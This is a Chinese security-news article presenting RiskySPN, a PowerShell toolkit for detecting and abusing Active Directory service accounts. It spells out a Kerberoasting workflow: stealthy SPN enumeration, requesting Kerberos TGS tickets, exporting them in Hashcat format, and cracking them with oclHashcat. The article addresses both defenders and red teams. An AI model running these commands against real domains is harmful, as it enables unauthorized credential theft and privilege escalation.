freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

如何使用RiskySPN检测和利用不安全的服务主体名称SPN
2023-09-28 10:06:53

关于RiskySPN

RiskySPN是一系列功能强大的PowerShell脚本集合,可以帮助广大研究人员检测和滥用跟SPN(服务主体名称)相关的账户。除此之外,该工具不仅可以帮助蓝队研究人员识别存在安全风险的SPN,还可以帮助红队研究人员利用Kerberos和活动目录来实现权限提升。

工具要求

由于该工具中的脚本模块基于PowerShell实现,因此我们需要在能够运行PowerShell脚本的设备上使用该工具。

工具安装

广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

git clone https://github.com/cyberark/RiskySPN.git

工具使用

安装模块

Import-Module .\RiskySPNs.psm1

或者,直接加载项目中的功能脚本:

. .\Find-PotentiallyCrackableAccounts.ps1

注意:这里需要确保Set-ExecutionPolicy的值设置成了Unrestricted或Bypass。

查看某个函数模块的详细功能信息

Get-Help Get-TGSCipher -Full

注意:所有的功能函数都提供了-Verbose模式。

搜索存在安全漏洞的SPN(服务主体名称)

搜索存在安全漏洞的账户:

Find-PotentiallyCrackableAccounts
敏感数据 + RC4 = $$$

生成包含漏洞账户的详细分析报告(CISO < 3):

Export-PotentiallyCrackableAccounts

获取凭证信息

请求Kerberos TGS:

Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"

Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher

其他使用方法

Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt

oclHashcat64.exe -m 13100 crack.txt -a 3

许可证协议

本项目的开发与发布遵循GPL-3.0开源许可证协议。

项目地址

RiskySPN:【GitHub传送门

参考资料

https://www.cyberark.com/resources/blog/service-accounts-weakest-link-in-the-chain

# powershell # 漏洞检测 # 权限提升 # SPN # 账户安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录